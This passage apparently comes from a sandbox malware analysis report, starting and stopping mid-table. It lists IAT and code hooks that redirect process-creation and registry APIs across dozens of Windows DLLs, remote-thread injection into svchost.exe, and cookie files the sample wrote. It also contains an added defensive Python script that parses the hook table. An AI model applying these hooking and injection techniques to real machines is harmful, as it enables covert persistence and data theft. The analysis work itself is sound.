Code pagefile_0x0000000007490000:+0x28dd2 kernelbase.dll:ActivatorUpdateForIsRouterChanges+0x140 2 bytes -
Code pagefile_0x0000000007490000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x1fe 8 bytes -
Code pagefile_0x0000000007490000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x1f8 2 bytes -
Code pagefile_0x0000000007490000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x20c 8 bytes -
Code pagefile_0x0000000007490000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x206 2 bytes -
Code pagefile_0x0000000007490000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x21a 8 bytes -
Code pagefile_0x0000000007490000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x214 2 bytes -
Code pagefile_0x0000000007490000:+0x28dce advapi32.dll:Wow64RedirectKeyPathInternal+0x3fa 8 bytes -
Code pagefile_0x0000000007490000:+0x28dd2 advapi32.dll:Wow64RedirectKeyPathInternal+0x3f4 2 bytes -
Code pagefile_0x0000000007490000:+0x28dce advapi32.dll:Wow64RedirectKeyPathInternal+0x408 8 bytes -
Code pagefile_0x0000000007490000:+0x28dd2 advapi32.dll:Wow64RedirectKeyPathInternal+0x402 2 bytes -
IAT pagefile_0x0000000007490000:+0x289b5 89. entry of cfgmgr32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 230. entry of user32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 240. entry of user32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 668. entry of shell32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 638. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 631. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 199. entry of advapi32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 185. entry of setupapi.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 174. entry of setupapi.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 261. entry of msctf.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 177. entry of shlwapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 133. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
IAT pagefile_0x0000000007490000:+0x289b5 134. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 41. entry of wldap32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of oleaut32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 220. entry of combase.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 517. entry of ole32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 550. entry of ole32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 85. entry of clbcatq.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 88. entry of clbcatq.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 79. entry of rpcrt4.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 789. entry of explorer.exe 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 808. entry of explorer.exe 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 134. entry of pnidui.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 142. entry of pnidui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 277. entry of authui.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 302. entry of authui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 271. entry of authui.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 154. entry of audioses.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 139. entry of actioncenter.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 2. entry of syncreg.dll 4 bytes advapi32.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 187. entry of shdocvw.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 91. entry of winspool.drv 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 84. entry of winspool.drv 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 155. entry of windows.ui.shell.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 160. entry of inputswitch.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 282. entry of stobject.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 268. entry of stobject.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 27. entry of capauthz.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 147. entry of wlidprov.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 68. entry of provsvc.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 9. entry of filesyncshell64.dll 4 bytes advapi32.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 101. entry of filesyncshell64.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 112. entry of abovelockapphost.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 121. entry of windows.networking.connectivity.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 99. entry of notificationcontroller.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 121. entry of thumbcache.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of wpncore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 283. entry of ntshrui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 240. entry of applicationframe.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 153. entry of twinui.appcore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 68. entry of wldp.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 100. entry of windows.immersiveshell.serviceprovider.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 530. entry of twinui.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 570. entry of twinui.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 79. entry of profext.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 681. entry of explorerframe.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 112. entry of sndvolsso.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 104. entry of sndvolsso.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 98. entry of tokenbroker.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 85. entry of tokenbroker.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 98. entry of settingsynccore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 47. entry of settingsyncpolicy.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of twinapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 81. entry of winmmbase.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 110. entry of winmm.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 110. entry of coreuicomponents.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 69. entry of webio.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 154. entry of wininet.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 166. entry of wininet.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 489. entry of comctl32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 51. entry of msi.dll 4 bytes advapi32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 236. entry of srchadmin.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 187. entry of urlmon.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 166. entry of urlmon.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
IAT pagefile_0x0000000007490000:+0x289b5 92. entry of settingmonitor.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 39. entry of networkstatus.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 56. entry of shacct.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 56. entry of wlanapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 82. entry of mfplat.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 93. entry of winhttp.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 84. entry of policymanager.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 55. entry of d2d1.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 116. entry of ucrtbase.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 117. entry of ucrtbase.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
IAT pagefile_0x0000000007490000:+0x289b5 236. entry of windows.ui.immersive.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 206. entry of windows.ui.immersive.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 62. entry of dhcpcsvc.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 30. entry of samlib.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 115. entry of iertutil.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 126. entry of iertutil.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 143. entry of iertutil.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 229. entry of propsys.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 87. entry of mmdevapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 135. entry of mrmcorer.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 103. entry of dxgi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 129. entry of es.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 154. entry of es.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 71. entry of d3d11.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 235. entry of hgcpl.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 91. entry of dwmapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 39. entry of ninput.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 54. entry of bcp47langs.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 61. entry of apphelp.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 126. entry of twinapi.appcore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 307. entry of uxtheme.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 39. entry of rmclient.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 124. entry of dnsapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 93. entry of userenv.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 64. entry of profapi.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 50. entry of powrprof.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 236. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 245. entry of windows.storage.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 215. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 113. entry of shcore.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Create Remote Thread #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x7ff977f39fa0 True 1
Fn
Modify Memory #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x7ff977f39fa0, size = 4 True 2
Fn
Data
Modify Memory #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x7490000, size = 1257472 True 1
Fn
Modify Memory #11: c:\windows\system32\svchost.exe 0x1c4 address = 0x4760000, size = 792 True 1
Fn
Data
Modify Control Flow #11: c:\windows\system32\svchost.exe 0x1c4 os_tid = 0xb40, address = 0x0 True 1
Fn
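Added example, not part of the VMRay report or its tooling: a small Python parser for IAT hook lines in the layout of the Hook Information table above. It groups the entries by hooked export and checks that the installer address (+0x289b5) and every trampoline (+0x94d0, +0x315b0, +0x316b8, +0x318ec) fall inside the 1257472-byte (0x133000) region that the Injection Information table shows being written into svchost.exe at 0x7490000. The sample lines are a subset copied from the table above; the regular expression and the record layout are assumptions derived from those lines, not a documented VMRay format.

```python
"""Summarise IAT hooks from VMRay-style hook table lines.

Added example, not report or VMRay code. The line format is inferred from the
visible table rows (an assumption), the sample lines are copied from the report.
"""
import re
from collections import defaultdict

# Subset of rows copied from the report's Hook Information table. The trailing
# "Code" row is included to show that the IAT parser skips non-IAT rows.
HOOK_LINES = """\
IAT pagefile_0x0000000007490000:+0x289b5 89. entry of cfgmgr32.dll 4 bytes kernelbase.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 230. entry of user32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
IAT pagefile_0x0000000007490000:+0x289b5 638. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000007490000:+0x318ec
IAT pagefile_0x0000000007490000:+0x289b5 133. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000007490000:+0x316b8
IAT pagefile_0x0000000007490000:+0x289b5 2. entry of syncreg.dll 4 bytes advapi32.dll:RegGetValueW+0x0 now points to pagefile_0x0000000007490000:+0x94d0
IAT pagefile_0x0000000007490000:+0x289b5 789. entry of explorer.exe 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000007490000:+0x315b0
Code pagefile_0x0000000007490000:+0x28dce kernelbase.dll:ActivatorUpdateForIsRouterChanges+0x146 8 bytes -
"""

# From the report's Injection Information: "Modify Memory ... address = 0x7490000,
# size = 1257472" (0x133000 bytes) written into svchost.exe (#11).
INJECTED_REGION = (0x7490000, 1257472)

# Assumed row layout (inferred from the table rows above):
# IAT <region>:+<off> <n>. entry of <module> <size> bytes <exporter>:<api>+0x0 now points to <region>:+<off>
IAT_RE = re.compile(
    r"^IAT\s+(?P<inst_region>\S+):\+0x(?P<inst_off>[0-9a-f]+)\s+"
    r"(?P<index>\d+)\.\s+entry of\s+(?P<module>\S+)\s+(?P<size>\d+)\s+bytes\s+"
    r"(?P<exporter>[^\s:]+):(?P<api>[^\s+]+)\+0x0\s+now points to\s+"
    r"(?P<tramp_region>\S+):\+0x(?P<tramp_off>[0-9a-f]+)$"
)


def region_base(name):
    """'pagefile_0x0000000007490000' -> 0x7490000 (VMRay names regions by base address)."""
    return int(name.rsplit("_", 1)[1], 16)


def parse_iat_hooks(text):
    """Return one record per IAT row; Code hooks and blank lines are skipped."""
    hooks = []
    for line in text.splitlines():
        m = IAT_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        hooks.append({
            "installer": region_base(d["inst_region"]) + int(d["inst_off"], 16),
            "module": d["module"],            # image whose IAT slot was overwritten
            "index": int(d["index"]),
            "exporter": d["exporter"],        # DLL the slot originally resolved to
            "api": d["api"],                  # export name that is being hooked
            "trampoline": region_base(d["tramp_region"]) + int(d["tramp_off"], 16),
        })
    return hooks


def summarize_by_api(hooks):
    """Group by export name: which images were patched, which exporter names the
    report used for the same export, and where the slot now points."""
    summary = defaultdict(lambda: {"modules": set(), "exporters": set(), "trampolines": set()})
    for h in hooks:
        s = summary[h["api"]]
        s["modules"].add(h["module"])
        s["exporters"].add(h["exporter"])
        s["trampolines"].add(h["trampoline"])
    return dict(summary)


def addresses_inside(hooks, region):
    """True if the hook installer and every trampoline lie within (base, size)."""
    base, size = region
    addrs = {h["installer"] for h in hooks} | {h["trampoline"] for h in hooks}
    return all(base <= a < base + size for a in addrs)


if __name__ == "__main__":
    hooks = parse_iat_hooks(HOOK_LINES)
    for api, s in sorted(summarize_by_api(hooks).items()):
        tramps = ", ".join(hex(t) for t in sorted(s["trampolines"]))
        print(f"{api:22} -> {tramps}  in {len(s['modules'])} image(s) via {sorted(s['exporters'])}")
    print("installer/trampolines inside injected region:", addresses_inside(hooks, INJECTED_REGION))
```

Grouping by export name rather than by exporter matters: the report lists RegGetValueW under both kernelbase.dll and advapi32.dll, yet every such slot is redirected to the same trampoline at +0x94d0, so it is one hook applied to every loaded image, not two. The region check ties the hook table to the injection table: all hook code resolves into the single 0x133000-byte write at 0x7490000, which is what makes that region the artifact to dump and analyse.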
Created Files
Filename File Size Hash Values YARA Match Actions
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\5AV8L20N.txt 0.33 KB MD5: 296d887b58e5ef72cba662dc9e71e600
SHA1: 04695b299c9b54ab8c694bf9fd986b20b9e09931
SHA256: 6909734c0f752dc11a7972fd04c7f7e59076a84fd9df44dffaa084483ee64631
SSDeep: 6:37IpLkTNyTlQgwXeKwYOUQe/XnJeMehd/qCYVTJh0z4xswT4lVRXn:3E9kTNyRdwXV2s/oX/3kTJh0z4KwT+TX
False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\MBJX4MYA.txt 0.20 KB MD5: e939180a8bff9e08419c60841301c2ae
SHA1: 96d0d00bafdcae91c8e4603d0b1e5465be4a7e71
SHA256: 68491399f80f0d0481a90cd3e42834262b21465a7784a98760d8293ff83b4206
SSDeep: 6:KRX8WWXiM2scKvYXyISWRX8WWXiL3ogXn:qX0XiMyKvYXbSWX0XiL3ogXn
False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DRDF2EZX.txt 0.09 KB MD5: e478700e454e0bb1742a70f00207df1d
SHA1: 33af30eadb826320c12c054ebd13a61edf44e8f5
SHA256: 7a8db261e58781982babaa6c592a34d5c1c78445b540e3928ffa85b528cdb813
SSDeep: 3:5AHKWqkUVZsHdyKvXv7Yew7Sd3vWJBSlYyZ0vXn:NWqdDsHc8NaBSlTkXn
False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\DN8YUCVA.txt 1.34 KB MD5: 439e180784d9ee72582c7403a9a43832
SHA1: 49c18f3e224df6b26526c747337ce25cd60e3704
SHA256: a1cca4a3435c45936cb9061096683e48bb52ee30646ba633448edbecbfd81fca
SSDeep: 24:idTEwXUIx+vnXAizQ7vnXX5xJRsJIwTNYisGENLjmQHhhi8GClSeX53WfU3smzfc:idYwXUIwvnXPzCvnXXLA6MpsGEtLHhQf
False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\PF9HBAFQ.txt 0.17 KB MD5: cb328f47b7e47d1b54f67ed63f9e3a0b
SHA1: f1d8f17b35e4ed673b94842d64c0032489099024
SHA256: 3fe1e920f4f285b764364522495178595edd3e69291d2557a0715a7e5ee8d323
SSDeep: 3:uWviTSsR3ur9cWTiILEVtyn8UoYtu0dXv6NuRVmERvUVYrEavXn:uWa2sQrlTatynfKERYVKrEkXn
False
C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\cookie.ie\Low\9XACNSYG.txt 0.65 KB MD5: d0129961ebfe50fa6ca75d21eb61e3a4
SHA1: d27b99f26b21b15b3596543c71dc9c90bcda9b19
SHA256: e806c3f694373d51d383c0c751000397134ae24b0ed1ebea86022e84acde3d90
